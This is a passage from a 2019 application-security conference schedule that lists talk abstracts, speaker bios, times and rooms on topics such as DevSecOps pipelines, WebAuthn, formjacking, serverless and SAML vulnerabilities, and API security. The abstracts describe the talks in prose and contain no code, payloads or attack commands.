The DevSecOps movement is about exactly that: shifting security assessment left and integrating it into the daily and sprint-ly cycles that DevOps has made popular. It means finding those touchpoints in our continuous integration/continuous delivery (CI/CD) pipeline where security tools can be inserted and run continuously against the software changes as they are made. It means using static code analysis, dynamic security testing, secure composition analysis of third party components, and platform vulnerability scanning to look at all aspects of security every day. It means breaking builds and rejecting changes when developers introduce new security vulnerabilities.

In this talk, I present my successes and challenges with integrating security into DevOps pipelines to provide continuous assessment of security posture. I focus on my latest experiences building delivery pipelines for a containerized microservice-based project where we integrated a broad set of open source and commercial tools to gather and present security data.

Speakers
avatar for Richard Mills

Richard Mills

DevOps Solution Architect, Coveros, Inc.
Richard Mills has more than 25 years of experience in software engineering with a concentration on pragmatic software process and tools. Rich has a specific focus in Agile development methods and is passionate about DevOps, Continuous Integration, and Continuous Delivery. As a DevOps... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 5

12:30pm

Lunch
Thursday September 12, 2019 12:30pm - 2:00pm
Exhibit Hall C

2:00pm

Making a Change, One at a time - Diversity: More than just Gender
There has been a lot of conversations around diversity and inclusion in the recent past.  This is a step in a positive direction. The benefits of diversity in cybersecurity are clear. As an industry, we can do better, we need to do better. We need not only to keep the conversation going but to really place some action behind it. While homogenous teams feel easier to operate in, it can lead to stagnation, or specialisations in some aspects at the expense of others.

In this talk, I will present some of my thoughts on the importance and benefits of diversity and inclusion in our industry. I will share some of my experiences working over the last few years towards diversity initiatives, some real change observed, challenges associated with it and small steps anyone can do to improve diversity.

Speakers
avatar for Vandana Verma

Vandana Verma

Security Architect, IBM India Software Labs
Vandana is a seasoned security professional with over a decade worth of experience ranging from application security to infrastructure and now dealing with cloud security. She works with various communities (InfosecGirls, OWASP, WoSec, and null) and is passionate about increasing... Read More →


Thursday September 12, 2019 2:00pm - 3:00pm
Salon 2

3:00pm

PM Coffee Break
Thursday September 12, 2019 3:00pm - 3:30pm
Exhibit Hall C

3:30pm

Building Secure Password-less Web Applications using WebAuthn
According to the 2019 Verizon Data Breach Investigation Report, 81% of breaches were caused by weak, stolen or reused passwords. But what if you NEVER had to deal with passwords in the first place? For the past several years, security experts across the industry have been working on a robust authentication protocol that does not involve passwords. The result is a specification called WebAuthn, which is now an official W3C web standard. With WebAuthn, developers can build secure web applications that enable users to experience password-less logins. In this session, we will explain how WebAuthn works and show how developers can leverage it using a demo.

Speakers
avatar for Krishna Chaitanya Telikicherla

Krishna Chaitanya Telikicherla

Security Engineer, Microsoft
Krishna Chaitanya Telikicherla works as a Security Engineer at Microsoft. He is passionate about application security, with specific interest in static code analysis. He also loves to play around with security and identity controls in Asp.net and Azure. Krishna blogs at https://novogeek.com... Read More →
avatar for Murali Vadakke Puthanveetil

Murali Vadakke Puthanveetil

Security Engineer, Microsoft
Murali Vadakke Puthanveetil works as a Security Engineer at Microsoft and a previous speaker at AppSec USA. He is particularly interested in figuring out authentication and authorization logic used by web applications.


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 2

3:30pm

Securing Modern Applications: The Data Behind DevSecOps
Hackers took three days to identify and exploit a known vulnerability in Equifax's web applications. More importantly. Equifax was not alone. Hackers quickly attempted to exploit the Struts vulnerability elsewhere. According to David Hogue, a senior technical director for the NSA’s Cybersecurity Threat Operations Center (NCTOC), "We had a nation-state actor within 24 hours scanning for unpatched [Struts] servers within the DoD." Other breaches were recorded at Alaska Airlines, the Canada Revenue Agency, Okinawa Power, the Japanese Post, the India Post, AADHAAR (India’s social security system), and the GMO Payment Gateway, to name a few.

The time required for hackers to exploit a newly disclosed open source vulnerability has shrunk by 93.5% in the last decade. This harsh reality establishes a new normal for software supply chain management and demands that organizations are prepared to do three things within 48 hours of a new public disclosure:
* Assess which, if any, of their production applications are exploitable
* Establish a comprehensive plan to remediate potential exposure,
* Implement necessary fixes in production

This session will highlight new data that reveals why three days (at most) is the new normal for DevSecOps teams to move new business /security requirements from design into production. It will also further enlighten DevOps teams, security and development professionals by sharing results from the 5th annual State of the Software Supply Chain Report -- a blend of public and proprietary data with expert research and analysis. Attendees can join this session to better understand how development and AppSec teams are applying lessons from W. Edwards Deming (circa 1982), Malcolm Goldrath (circa 1984) and Gene Kim (circa 2013) to improve their ability to respond to new business requirements and cyber risks.

Speakers
avatar for Derek Weeks

Derek Weeks

Vice President, Sonatype
Derek E. Weeks is the world's foremost researcher on the topic of DevSecOps and securing software supply chains. For the past five years, he has championed the research of the annual State of the Software Supply Chain Report and the DevSecOps Community Survey. Derek is a huge advocate... Read More →


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 3

3:30pm

Building Secure React Applications
Cross-Site Scripting (or client-side JavaScript injection) and other client-side risk are well known technical challenges that web application developers have faced for many years. While frameworks like React provide some automatic defenses to stop Cross Site Scripting; React developers still require specialized knowledge to build secure React applications. This presentation will review some of the necessary general purpose Cross Site Scripting defense recommendations as well as present specialized techniques that all React developers who wish to build secure React applications will benefit from.

Speakers
avatar for Jim Manico

Jim Manico

Founder, Manicode Security
Jim Manico is the founder of Manicode Security where he trains software developers on secure coding and security engineering. He is also an investor/advisor for KSOC, Nucleus Security, Signal Sciences andBitDiscovery. Jim is a frequent speaker on secure software practices, is a member... Read More →
avatar for Ron Perris

Ron Perris

Manicode Security
Ron provides secure code training and specific remediation guidance through in-person workshops and online courses at Manicode Security. Also, as a member of the Node.js Security WG, Ron provides source code review and code remediation guidance to the JavaScript developer communi... Read More →


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 6

3:30pm

Quantifying the Security Benefits of Debloating Web Applications
As software becomes increasingly complex, its attack surface expands enabling the exploitation of a wide range of vulnerabilities. Web applications are no exception since modern HTML5 standards and the ever-increasing capabilities of JavaScript are utilized to build rich web applications, often subsuming the need for traditional desktop applications

One possible way of handling this increased complexity is through the process of software debloating, i.e., the removal not only of dead code but also of code corresponding to features that a specific set of users do not require. Even though debloating has been successfully applied on operating systems, libraries, and compiled programs, its applicability on web applications has not yet been investigated.

In this project, we present the first analysis of the security benefits of debloating web applications. We focus on four popular PHP applications and we dynamically exercise them to obtain information about the server-side code that executes as a result of client-side requests. We evaluate two different debloating strategies (file-level debloating and function-level debloating) and we show that we can produce functional web applications that are 46% smaller than their original versions and exhibit half their original cyclomatic complexity. Moreover, our results show that the process of debloating removes code associated with tens of historical vulnerabilities and further shrinks a web application’s attack surface by removing unnecessary external packages and abusable PHP gadgets.

Speakers
avatar for Babak Amin Azad

Babak Amin Azad

PhD Candidate, Stony Brook University
Babak is a PhD candidate at state university of New York at Stony Brook. In a normal day, he studies vulnerabilities and practices that make the web an unsafe place. These days, his main focus is on web attack surface reduction and also bot detection. Prior to starting his PhD, he... Read More →


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 4

3:30pm

API Security Project
Join us and take part of the creation of the API Security Project.
  • How are API-based apps different than traditional apps?
  • Why do this apps deserve their own OWASP security project?
  • Roadmap of the project
  • Introducing API Security Top 10 - RC1 in depth
  • Next steps
Join the mailing list:
Join the effort:

Speakers
avatar for Inon Shkedy

Inon Shkedy

Head of Security Research, Traceable.ai
The speaker has 8 years of experience in application security. He started his career in a red team in a government organization for 5 years, and then moved to the Silicon Valley to learn more about startups, modern applications and APIs. Today he provides consultation to various companies... Read More →
avatar for Erez Yalon

Erez Yalon

Director of Security Research, Checkmarx
Director of Security Research at Checkmarx; Project Leader at OWASP; Founder of AppSec Village at DEF CON


Thursday September 12, 2019 3:30pm - 4:15pm
Virginia A

3:30pm

Beyond data-at-rest: Advances in Native NoSQL Database Encryption
Highly sensitive databases require enhanced technical measures to protect the confidentiality of their workloads. Typical controls in our application toolkit for these scenarios include implementing well-defined, mature authentication & authorization, and strong network (data-in-transit) & storage (data-at-rest) encryption paired with modern key management practices. Some systems further offer database-specific encryption mechanisms which work at the physical datafile level (and even the column- or row- level in a relational database) on top of any underlying OS full-disk or whole volume encryption. But fundamentally, these are server-side encryption models where the threat is physical media breach, backup leaks, or possibly protection from certain classes of operating system attacks; the assumption is that the database administrator, root user, or system level processes running on the machine are fully entrusted to access plaintext data and their associated keys.

This session will take a deep dive into the threat models, designs and recent developments in client-side (data-in-use) encryption, including lessons learned from recent work bringing native client-side query integration into the most widely deployed open source NoSQL database in the world. We will discuss the security guarantees, confidentiality/performance trade-offs, and limitations among different types of authenticated encrypted search. Reference query design patterns will be presented, with example code demonstrating strong end-to-end encryption on public cloud or in on-premise datacenters.

Speakers
avatar for Kenneth White

Kenneth White

Product Security, MongoDB
Kenneth White is a security engineer whose work focuses on networks and global systems. He is co-founder and Director of the Open Crypto Audit Project and led formal security reviews on TrueCrypt and OpenSSL. He currently leads applied encryption engineering in MongoDB's global product... Read More →


Thursday September 12, 2019 3:30pm - 4:15pm
Lincoln 5

4:30pm

Running FaaS with Scissors
Taking a DevSecOps mindset has created many opportunities to nudge organizations into improving how we create secure code. The security and DevOps landscape has continued to evolve with many exciting improvements in the past year. In this talk, we’ll cover the new methods available utilizing serverless and Function as as Service (FaaS) technologies. We’ll discuss how you can pave a speedy road for app teams to develop while constructing guard rails using OpenFaaS. Utilizing containerized security tools allows for dramatically quicker and more consistent assessments of both running and static code. By using the techniques discussed, you can change security testing from an occasional point in time exercise to continuously testing with fast feedback loops. Having created these at past employers, we bring real-world experience of creating fast and agile testing automation to AppSec teams.

Speakers
avatar for Matt Tesauro

Matt Tesauro

Matt Tesauro is currently establishing a SDLC at a large healthcare software provider. Prior to his current role, he was a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Previously, he was a founder and CTO of 10Security, a Senior... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 2

4:30pm

A Case Study in Scaling Oversight
Learn how a seemingly inconsequential code pattern enables development teams to bound the amount of code that needs security scrutiny, how combining it with some specific software pipeline & workflow changes enable a small blue teams to ride herd on a larger, fast moving application development group and how this incentivized investment in security infrastructure within Google.

This talk:
* uses the Trusted Types WICG proposal to explain the code change,
* explains how Google has internally done the same for server-side injection vulns across 6 programming languages and presents bug bounty stats for projects (Gmail and others) that adopted these techniques,
* explains how we tweaked Google's code analysis pipeline and commit workflow to enable efficient interactions between security & devs,
* identifies analogous (& currently-overlooked) open-source mechanisms,
* explains how some specific integrations guide developers towards secure code patterns and incentivize investment in secure tools & abstractions.

Speakers
avatar for Mike Samuel

Mike Samuel

Software Engineer, Google LLC
Mike Samuel works on Google's technical infrastructure team improving libraries and programming languages to make it easier to produce secure & robust software. Mike has worked on JavaScript sandboxing, the Secure EcmaScript and other language committee proposals, making template... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 3

4:30pm

The As, Bs, and Four Cs of Testing Cloud-Native Applications
Security assessments are a critical part of any security program. Being able to identify – and communicate about – vulnerabilities systems is required to get vulnerabilities prioritized for remediation. For web and mobile applications, assessment methodologies are reasonably straightforward and established. However, for cloud-native applications, the combination of new technologies and architectural elements has introduced questions about how to scope, plan, and execute security assessments. This presentation looks at how the assessment landscape has changed with the introduction of cloud-native applications and explores how threat modeling is central to testing their security. In addition, the “Four C’s” conceptual model for looking at cloud-native application security is introduced, including a discussion of how both automated and manual testing methodologies can be used to accomplish assessment goals. Finally, vulnerability contextualization and reporting are discussed, so that teams running cloud-native application assessments can properly characterize the results of their efforts to aid in the prioritization and remediation of identified issues.

Speakers
avatar for Dan Cornell

Dan Cornell

CTO, Denim Group
A globally recognized application security expert, Dan Cornell holds over 20 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 6

4:30pm

Fighting Formjacking and Magecart - Separating fact from fiction
Formjacking attacks are simple and lucrative: cybercriminals load malicious code onto retailers’ websites to steal shoppers’ credit card details, with 4,800+ unique websites compromised on average every month. Both well-known and small-medium businesses were attacked, conservatively yielding tens of millions of dollars to bad actors last year.” - Symantec 2019 Internet Security Threat Report

There are several ways to distribute Formjacking scripts, from browser add-ons to malware on the machine; but the most popular way is compromising the site's 3rd party JS and using them to hitchhike to all of their clients.

Because 3rd party scripts are loaded directly into the browser from remote servers, they are out of bounds for traditional security solutions like Firewalls, WAF’s and such. They are also tough to monitor, as their behavior may change from user to user, making their actions very hard to analyze. However; these scripts share the same level of access to a webpage as the website’s internal scripts. Every script on the page, can have access to every field, manipulate the content of the page and even record keystrokes.

Millions of users were affected by this attack in the past year alone, being the favorite tactic of the Magecart groups (named so for targeting Magento based sites) and many high profile hacks, from Delta Airlines to British Airways, Ticketmaster and more.

The recent rise in Formjacking attacks created much noise, pointing to multiple technologies to try and close this gap; from CSP and SRI to proxying JS to control JS actions on the page and real-time sandboxing. These said with such passion that none are discussing the drawbacks of each approach. In my presentation, I cover all approaches, show real-time demos of Formjacking code, how the advocated methods can block it, and if and how can these be easily circumvented.

Speakers
avatar for Avital Grushcovski

Avital Grushcovski

EVP Product & PS, Source Defense
An entrepreneur at heart, Avital is first and foremost a creator and a problem solver. For many years, Avital has brought cohesion to the security, professional services, R&D, and marketing efforts of organizations; finding the balance needed to move the company forward while keeping... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 4

4:30pm

What Do Hackers Want from Bounty Programs?
Bounty programs are all the rage these days but what do hackers / researchers think of them? Drawing on my experience as a participant in multiple bounty programs I want to discuss the ins and outs of how hackers work with companies, what they are looking for (hint: not just money) and how companies can improve their programs to attract more researchers.

Speakers
YS

Yakov Shafranovich

Application Security
I am technology generalist focused on solving problems. Some of things I have done include: developing visual SQL tools, contributing to mobile apps to help people get healthier, and helping non-profits preserve books. I also participated in the development of many anti-spam standards... Read More →


Thursday September 12, 2019 4:30pm - 5:15pm
Lincoln 5

5:30pm

Networking Event
Thursday September 12, 2019 5:30pm - 7:30pm
Exhibitor Hall C

6:00pm

Leaders Meeting
Thursday September 12, 2019 6:00pm - 7:30pm
Lincoln 2
 
Friday, September 13
 

7:30am

Registration
Friday September 13, 2019 7:30am - 5:00pm
Atrium

8:00am

Capture the Flag - CMD+CTRL Web Application Cyber Range
CMD+CTRL Web Application Cyber Range
Want to test your skills in identifying web app vulnerabilities?  Join OWASP and Security Innovation as attendees compete in CMD+CTRL  a web application cyber range where players exploit their way through hundreds of vulnerabilities that lurk in business applications today.  Success means learning quickly that attack and defense is all about thinking on your feet.
For each vulnerability you uncover, you are awarded points. Climb the interactive leaderboard for a chance to win fantastic prizes! CMD+CTRL is ideal for development teams to train and develop skills, but anyone involved in keeping your organization’s data secure can play - from developers and managers and even CISOs.
Register early to reserve your spot!
https://web.securityinnovation.com/owaspdc2019

Speakers
avatar for Kevin Poniatowski

Kevin Poniatowski

Senior Security Instructor and Engineer, Security Innovation
Kevin Poniatowski, Senior Security Instructor and Engineer at Security Innovation, brings an optimal blend of speaking ability, technical savvy, and an insatiable passion for security to Security Innovation's training customers. This produces an engaging and enlightening environment... Read More →


Friday September 13, 2019 8:00am - 3:00pm
Virginia B

9:00am

Talent matters. You matter.
The internet wasn’t built with security in mind, the world has a massive talent shortage, and we can’t rely on automation to solve everything.

If you’re on an application security team, I’m willing to bet you have more to do than time and resources to do it. Maybe one of your colleagues left for a new job last month, and there are two additional unfilled positions on your team. You could actually be in a position where you’re trying to do the jobs of 4 people.

Talent matters. You matter.

This talk is about preventing and addressing burnout for overworked application security professionals. It’s also about how to attract, retain, and grow a great team.

Speakers
avatar for Caroline Wong

Caroline Wong

Caroline’s close and practical information security knowledge stems from broad experience as a Cigitalconsultant, a Symantec product manager, and day-to-day leadership roles at eBay and Zynga.Caroline is an advisor for RSA Conference and ISC2 North America. She has been featured... Read More →


Friday September 13, 2019 9:00am - 10:00am
Salon 2

10:00am

AM Coffee Break
Friday September 13, 2019 10:00am - 10:30am
Exhibit Hall C

10:00am

Members Lounge
Looking for a place to recharge your electronics?  
Feeling a bit hungry or thirsty?  
Maybe you are looking for some cool OWASP Member Only swag?
Or just looking to take a break from the hectic conference atmosphere?
Head on over to the Members Lounge located in the XXXX Room.

Here you can grab a snack, quench your thirst, recharge your electronics, kick up your feet, and network with other OWASP members all within a relaxed atmosphere.

Not an OWASP Member?  No problem!  Swing on over to the lounge, and you can sign up on the spot, or join here!

Look for the signs or ask a volunteer how to find us!

Friday September 13, 2019 10:00am - 3:00pm
Atrium

10:30am

A Purple Team View of Serverless and GraphQL Applications
The presentation will begin with quick refresher on Serverless functions and GraphQL Applications. The author will deploy a serverless function with GraphQL to demonstrate.

The presentation with demo will also highlight some common attacks against serverless functions, namely:
* Function Data Event Injection
* Lateral Movement through Remote Code Execution on Function
* NoSQL Injection, specifically DynamoDB Injection
* ReDOS Attacks against Serverless functions, increasing transaction fee per serverless invoke to large values (e.g. $3 per request)

Subsequently, author will demonstrate attacks against GraphQL Functions like:
* Authorization Bypass through Introspection
* Insecure Direct Object Reference Attacks
* NoSQL Injection Attacks\
* Deserialization vulnerabilities

Finally the presentation ends with the author demonstrating attacks against Serverless-GraphQL Applications, where the author will use Remote Code Execution and DoS Style queries to demonstrate specific attacks leading to cloud API-based lateral movement and DoS leading to financial exhaustion

All the while, the author will highlight some key deficiencies in the lack of tooling, “batteries-included” security frameworks and DIY validation that might exacerbate these flaws

Speakers
avatar for Abhay Bhargav

Abhay Bhargav

Founder, we45
Abhay Bhargav is the Founder of we45, a focused Application Security Company. Abhay is a builder and breaker of applications. He is the Chief Architect of “Orchestron", a leading Application Vulnerability Correlation and Orchestration Framework. He has created some pioneering works... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 2

10:30am

OWASP Serverless Top 10
In moving to serverless, we shift some security responsibilities to the infrastructure provider by eliminating the need to manage servers. Unfortunately, that doesn’t mean we’re entirely absolved of all security duties. Serverless functions still execute code and can still be vulnerable to application-level attacks. As a new type of architecture, serverless presents new security challenges. Some are equal to traditional application development, but some take a new form. Attackers are thinking differently, and developers must do so as well to gain the upper hand.

In this talk, I will dive into the Top 10 risks of the OWASP Serverless Top 10 project. I will discuss why these risks are different from traditional attacks and how we should protect our application against them. I will also introduce OWASP DVSA, a deliberately vulnerable tool, aiming to assist both security professionals and developers to better understand the implications and processes of serverless security.

Speakers
avatar for Tal Melamed

Tal Melamed

Head of Security Research, Protego Labs
In the past year, Tal Melamed been experimenting in offensive and defensive security for the serverless technology, as part of his role as Head of Security Research at Protego Labs. Specializing in AppSec, he has more than 15 years of experience in security research and vulnerability... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 3

10:30am

0 to 1 Startup Security
Have you ever wondered what it takes to bring a startup from "zero security" to "I think we can go public" or "we are ready for enterprise business now"? That is what this talk is about: what it takes from a talent, program and political standpoint to make this happen.

Speakers
avatar for Coleen Coolidge

Coleen Coolidge

CISO, Segment
Coleen Coolidge is the CISO @ segment in San Francisco, building holistic security and trust programs to protect customer data. Previously, she did the same at Twilio (pre-IPO through post-IPO) as Sr Director of Trust and Security. She's also served in security-leadership positions... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 6

10:30am

SSO Wars: The Token Menace
It is the year 2019. Humanity has almost won its long-standing war against Single-Sign On (SSO) bugs. The last of them were discovered and eradicated some time ago and the world is now living in an era of prosperity while the Auth Federation enjoys peaceful CVE-free times. However, while things seem to be running smoothly, new bugs are brewing at the core of major implementation libraries. This is probably the last chance for the evil empire to launch a world scale attack against the Auth Federation.

In this talk, we will present two new techniques:
1) A new breed of SAML implementation flaws that break XML signature validation and enable arbitrary modification of the SAML assertion, which enables attackers to authenticate as arbitrary users or grant themselves arbitrary authorization claims. Although any implementation may be affected by this flaw, we will show how it affects Microsoft Windows Identity Framework (WIF) applications, Windows Communication Foundation (WCF) web services, and flagship products such as SharePoint and Exchange Servers.
2) A bug in the .NET crypto library, which may allow attackers to gain Remote Code Execution (RCE) or Denial of Service (DoS) depending on the availability of code gadgets in the target server.

Speakers
avatar for Alvaro Muñoz

Alvaro Muñoz

Principal Security Researcher, Micro Focus Fortify
Alvaro Muñoz(@pwntester) works as a Principal Software Security Researcher with Micro Focus Fortify, Software Security Research (SSR) team. Before joining the research organization, he worked as an Application Security Consultant helping top enterprises to deploy their application... Read More →
avatar for Oleksandr Mirosh

Oleksandr Mirosh

Micro Focus
Oleksandr Mirosh has over 11 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for Fortify Software Security Research team in Micro Focus investigating and analyzing... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 4

10:30am

Dependency Check
Speakers
avatar for Jeremy Long

Jeremy Long

Principal Engineer
Jeremy Long is a principal engineer at a large financial institution. He specializes in securing the SDLC via secure development training, security requirements and coding standards, tooling for early identification in build pipelines, etc. He has a deep understanding of static analysis... Read More →


Friday September 13, 2019 10:30am - 11:15am
Virginia A

10:30am

Keys Under Doormats: Problems and Solutions for Securely Storing Credentials in Web Applications
Encryption keys and passwords are truly "keys to the kingdom." Acquiring them allows attackers to open all kinds of doors, and yet developers are often careless about how they handle them. We often see passwords and keys hard coded in the application source, stored with minimal obfuscation in configuration files, and in plaintext in databases. As a result, they fall victim to reverse engineering and software vulnerabilities such as Path Traversal, XXE, Local File Inclusion, and others.

To help illustrate these risks we review the most common methods of storing credentials in an application, and discuss best practices for storing them, such as using keystores.

Once your secrets are properly secured, however, there is an important remaining issue -- how do you secure the Master Key? The security of this “key that secures other keys" (often referred to as the Key Encrypting Key or KEK) is critical to the security of the system. Would it not be vulnerable to the same issues we just tried to solve with keys and passwords? In our presentation we discuss preferred ways for securely storing KEKs, from hardware to software, and their relative costs.

We propose several low cost ways for storing KEKs that any application can afford to implement, including what we believe is a novel approach that is resistant to remote attacks up to and including path traversal vulnerabilities where the attacker can obtain the contents of all relevant files. We then conclude by offering our open source library that helps to achieve that.

Speakers
avatar for Dmitriy Beryoza

Dmitriy Beryoza

Senior Security Researcher, Vectra AI
Dmitriy is a Senior Security Researcher at Vectra AI. He spent over 25 years of his life building software before realizing that breaking it is much more fun. :) Dmitriy is passionate about all things security, with a particular interest in web and binary exploitation, reverse engineering... Read More →
avatar for Ron Craig

Ron Craig

Program Manager for IBM Security's Secure Engineering and Incident Response, IBM
Ron works to help bridge the gap between Security knowledge and practice. His passion is educating developers and business leaders in why secure engineering is important and how it affects all our lives. Ron has over 30 years of experience in development and engineering. His interests... Read More →


Friday September 13, 2019 10:30am - 11:15am
Lincoln 5

11:30am

How to Build an AppSec Training Program That Isn’t Boring
Training plays a critical role in software security because developers often start with little security knowledge. This lack of knowledge can be augmented through use of automated tools and dedicated security professionals to discover vulnerabilities, but security personnel can be challenging to scale and tools cannot identify many weaknesses.

Maybe you currently have some training in place, but it isn’t well received and seen more as a mandatory interruption rather than providing real value. Maybe the content doesn’t feel up to date or relevant to your team based on the technology frameworks they use. Other challenges include budget constraints, attendee participation, knowledge retention, training recurrence, tracking, and measuring general effectiveness.

This presentation will examine various approaches for providing application security training within your organization or team. We’ll look at how you can leverage free and low-cost content to get started with a limited budget, and examine pros/cons of various forms of training: instructor-led, computer-based training, hands-on labs, gamification, etc. We will detail actionable steps you can take to bootstrap, monitor, and maintain a customized program that builds lasting appsec knowledge in your organization.

Speakers
avatar for Brice Williams

Brice Williams

Cybersecurity Practice Lead, SysLogic
Brice Williams is the Practice Lead for Application Security Services at SysLogic Inc. and has over 20 years of experience in software development and security best practices. Brice serves as a trusted advisor to global organizations providing modern cybersecurity guidance and support... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 2

11:30am

A Practical Guide to Complying with SB-327 (Information Privacy of Connected Devices)
Senate Bill 327 sets a new standard for the security and privacy of connected devices. It will come into force in January 2020. The way connected devices are defined in this bill is broad. The effect of the law is not limited to a state since it is not justifiable, or in many cases feasible, for a typical manufacturer to launch different products in different geo-locations within a country. During the talk, several questions around the scope and applicability of the law are rigorously analyzed and answered after careful examination of the possible scenarios and products. The talk presents categories of 'appropriate' security features to take into consideration, and provides a taxonomy of security controls applicable in various cases and scenarios. The audience will leave the talk with practical steps and guidelines as of how they can comply with the regulation.

Speakers
avatar for Farbod H Foomany

Farbod H Foomany

Technical Lead of Security Research, Security Compass
Farbod H Foomany is a technical lead (of security research) at Security Compass. He has degrees in electrical engineering (control systems), computer engineering (artificial intelligence), and has completed a PhD with main research on security aspects of using voice-print and other... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 3

11:30am

A Day in the Life of IoT Security Architect
How different a IoT Security is from typical traditional Security architect, tasks performed by the IoT Security Architect in a system of connected devices, Steps taken by First responders to IoT threats, using the relevant tools to perform the threat detection and monitoring, categorize the typical process in a cloud-based IoT security environment, Analyzing the End to End IoT use cases in a system of connected devices.

Speakers
avatar for Praveena Sridhar

Praveena Sridhar

Technical Leader IoT-Security, Cisco Systems
Praveena Sridhar is Technical Leader in Security-IoT and  Quality with 20 years of experience in the Software  Industry across various domains. She is B.E Hons from BITS Pilani and has Certificate from Stanford in  Advanced Computer Security. She has technically managed teams... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 6

11:30am

Farewell, WAF - Exploiting SQL Injection from Mutation to Polymorphism
In this talk, we'll not only go through the core ideas and concepts of the Web application firewall (WAF) and also some background information about mutation testing against web applications, but introduce a promising direction of automatically generating SQL Injection attacks with Polymorphism. We'll be giving out some case studies and bypasses for the ModSecurity's latest version alongside our demonstrations and explain why common detections cannot help in this place as well. The audience will then realize the power of this concept and the beauty of the SQL language after the talk.

Speakers
avatar for Boik Su

Boik Su

Boik Su has five-year experience in Web development, and actively using Open Source Software to create and manage applications or tools for his research in Web Security. He has received some awards from CTFs, been the speaker at AVTokyo 2017 and 2018, Taiwan Modern Web 2017, OSCON... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 4

11:30am

SAMM
OWASP SAMM (https://owaspsamm.org) is the prime maturity model for software assurance that provides an effective and measurable way for all types of organizations to analyse and improve their software security posture. Building security into the software development and management practices of a company can be a daunting task. There are many elements to the equation: company risk profile, organizational structure, different stakeholders, technology stacks, tools and processes, and so forth. Implementing software assurance will have a significant impact on the organisation. Yet, trying to achieve this without a good framework is most likely leading to just marginal and unsustainable improvements. OWASP Software Assurance Maturity Model (SAMM) gives you an effective and measurable way for all types of organizations to analyse and improve their software security posture in 3 levels of maturity - thus creating a step-by-step software assurance navigation plan. It enables you to formulate and implement a strategy for software security that is tailored to the risk profile of your organisation. In this talk, we give an overview of the new release of the SAMM model. After 10 years since its first conception, it was important to align it with today’s development practices. We will cover a number of topics in the talk: (i) the core structure of the model, which was redesigned and extended to align with modern development practices, (ii) the measurement model which was setup to cover both coverage and quality and (iii) the new security practice streams where the SAMM activities are grouped in maturity levels. We will demonstrate the new SAMM2 toolbox to measure the maturity of an example DevOps team and how you can create a roadmap of activities.

Speakers
avatar for John Ellingsworth

John Ellingsworth

Security Principal
John Ellingsworth is a security principal at a Fortune 1000 company where he helps software development teams build secure enterprise solutions at scale. When not scaling application security, he can be found hanging out with his family, often outdoors, and probably scaling mount... Read More →
avatar for Hardik Parekh

Hardik Parekh

Senior Director, Head of Product & Application Security, Splunk
Hardik Parekh is recognized thought leader and executive in security/privacy domain with hands-on contributions to SANS CWE Top 25, OWASP OpenSAMM, BSIMM 1.0 to BSIMM 9; and SAFECode. Hardik is part of the core team which developed OWASP OpenSAMM 2.0.Hardik has 16+ years of hands-on... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Virginia A

11:30am

Common API Security Pitfalls
The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications have sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolutely must-have, and which additional security measures do you need to take into account?

These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls, that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

Speakers
avatar for Philippe De Ryck

Philippe De Ryck

Founder, Pragmatic Web Security
Philippe De Ryck helps developers protect companies through better web security. As the founder of Pragmatic Web Security, he travels the world to train developers on web security and security engineering. His Ph.D. in web security from KU Leuven lies at the basis of his exceptional... Read More →


Friday September 13, 2019 11:30am - 12:15pm
Lincoln 5

12:30pm

Lunch
Friday September 13, 2019 12:30pm - 2:00pm
Exhibit Hall C

2:00pm

A DevSecOps Tale of Business, Engineering, and People
DevOps and the subsequent move to bring security in under the umbrella of DevSecOps has created a new ethos for security. This is good. But, when things go wrong–and we know they will–are we going to be successful with the DevSecOps model, or will we be left searching yet again?

In an attempt to answer this question, we will look back in time over 120 years to unveil a tale that touches on business, engineering, and resilience. We will see how engineering decisions affect the lives of those around us and even though the world has radically changed over the last century, we are still facing many of the same root challenges.

Along the way, we will highlight the high-performing DevSecOps teams of today and introduce a framework for approaching DevSecOps in your organization. Topics range from empathy to lean to system safety with the hope to frame a new playbook for devs, ops, and security to work together.



Speakers
avatar for James Wickett

James Wickett

Sr. Security Engineer and Developer Advocate, Verica
James is a dynamic speaker on software engineering topics ranging from security to development practices. He spends a lot of time at the intersection of the DevOps and Security communities, and seeing the gap in software testing, James founded the open source project, Gauntlt, to... Read More →


Friday September 13, 2019 2:00pm - 3:00pm
Salon 2

3:00pm

PM Coffee Break
Friday September 13, 2019 3:00pm - 3:30pm
Exhibit Hall C

3:30pm

Threat Modeling with Flow Diagrams
Threat Modeling is a great way to identify security risk by structuring possible attacks, bad actors and security controls over a broad view of the targeted system.

